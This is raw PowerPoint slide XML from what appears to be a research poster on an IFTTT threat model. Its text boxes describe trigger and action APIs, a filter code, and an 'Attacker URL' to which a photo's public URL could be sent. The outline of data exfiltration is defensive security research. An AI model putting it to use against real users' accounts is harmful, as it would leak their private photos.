              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3BCDBB-2AFF-49DF-BFBA-33F74642919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25239" y="5181599"/>
            <a:ext cx="775852" cy="775852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="443" name="Picture 442">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCA851D3-6503-426D-862C-74C97117342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77341" y="5195453"/>
            <a:ext cx="720435" cy="720435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="445" name="Picture 444" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D3DF794-2ABD-4C4F-AE7B-3D8F69ECF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2087" y="4839637"/>
            <a:ext cx="804313" cy="804313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="TextBox 445">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6FC018-7C03-4557-AAD3-D1A2AB5E8DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692727" y="4128656"/>
            <a:ext cx="3075709" cy="83127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t>For personalization "Rename the photo to..."optional</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="TextBox 447">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A83A018-DB6B-4FE5-91F1-1816D2D66A26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716252" y="7038109"/>
            <a:ext cx="3097712" cy="69272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t>event from other service:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"Upload it to my cloud"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="TextBox 443">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB771E1D-75AE-4CB4-A904-1920470358F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284315" y="4365811"/>
            <a:ext cx="2365866" cy="477054"/>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Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645078BE-2904-4C74-8C4C-71DE9BCF3ADB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17010651" y="6888638"/>
            <a:ext cx="4990367" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>if         then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="TextBox 462">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E645408-DB2A-4DDF-B561-E0DCD42CEBD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19313750" y="5362036"/>
            <a:ext cx="1039963" cy="473499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln>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t>service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="464" name="Picture 463" descr="A close up of graphics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39BF460B-4923-441F-A414-698C4C5318A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805995" y="6543856"/>
            <a:ext cx="1226289" cy="1226289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="465" name="Picture 464">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898469BF-3236-4099-BA4B-A56A59E018C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608481" y="6782283"/>
            <a:ext cx="779719" cy="779719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="TextBox 465">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9924AA2F-9D14-424E-B55F-DA4EEA456554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20834978" y="5349240"/>
            <a:ext cx="1644021" cy="494607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln>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trigger event</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="TextBox 466">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4618B948-7168-4C5E-BF71-25B90CD9E64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18209543" y="8710679"/>
            <a:ext cx="1039963" cy="473499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln>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service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="TextBox 467">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFA7AAFA-EDF7-4B51-9F2B-8C2C71581D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19819441" y="8702040"/>
            <a:ext cx="1607999" cy="46274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t>action event</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="TextBox 468">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C30045E-4B16-4A35-BE42-1FC99237FE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21941958" y="7291974"/>
            <a:ext cx="1885089" cy="4319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0C234B"/>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t>Attacker URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Rectangle 469">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CB5E372-A0D0-4A4C-95E2-327BD0498F10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18016451" y="8100446"/>
            <a:ext cx="6162502" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GoogleDrive.uploadFileFromUrlGoogleDrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.setURL(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>									.setFileName(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>									.setPath(...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Right Bracket 470">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A3902B-2BD2-498A-954C-0F5BB90AC334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="20917189" y="6979522"/>
            <a:ext cx="117181" cy="1330037"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0C23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2" name="TextBox 471">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6830CA0-9CA7-4508-9518-3DB68319F264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20089088" y="7721849"/>
            <a:ext cx="2438399" cy="477054"/>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action API:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Right Bracket 473">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F45668-58ED-48CB-AA87-56945AE59791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="18236343" y="6013858"/>
            <a:ext cx="240482" cy="1417321"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0C23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5" name="TextBox 474">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584DCE0B-2A81-465D-80D3-E4BD2C3FC31C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17344995" y="5844091"/>
            <a:ext cx="7023765" cy="1461939"/>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trigger API: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IosPhotos.newPhotoInCameraRoll.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PublicPhotoURL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>											AlbumName</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>											TakenDate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2500" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="476" name="Straight Arrow Connector 475">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A866D50F-C264-44C5-8ABC-D52F0697F896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="23156193" y="6873240"/>
            <a:ext cx="0" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="479" name="Straight Arrow Connector 478">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80CD969-6B6A-465D-AFA4-4425018EFE47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22524720" y="7741920"/>
            <a:ext cx="0" cy="472440"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="483" name="Picture 482" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7683CE42-B6CB-4418-B3E7-7A9171527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625" y="6524590"/>
            <a:ext cx="596495" cy="596495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="488" name="Straight Connector 487">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B85AAF-3FAE-44F2-B345-266D04FC665A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="18714720" y="8458200"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>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ABC3ED20-35CB-4C7C-9440-67892FC91A28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="20634960" y="8442960"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>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0C9FA430-1A31-4AC5-A091-6410BB21B10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="19857720" y="5882640"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>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06589C0B-89A4-4DB5-89F3-B282CFBE8D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="21732240" y="5852160"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="TextBox 496">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E065D853-AC08-40AD-967E-BA43D2805C4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377880" y="3583459"/>
            <a:ext cx="271848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IFTTT: Threat Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="500" name="Picture 499" descr="A picture containing table, computer, sky&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EF08CF-E2F5-4FFC-9FA2-F8700CA8313F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:alphaModFix amt="5000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="778" y="0"/>
            <a:ext cx="32918400" cy="16459200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="90000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3698196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1263</TotalTime>
  <Words>1146</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>119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Abadi Extra Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</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Allaka</dc:creator>
  <cp:lastModifiedBy>Praveen Allaka</cp:lastModifiedBy>
  <cp:revision>167</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-22T11:29:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-25T15:14:12Z</dcterms:modified>
</cp:coreProperties>
</file>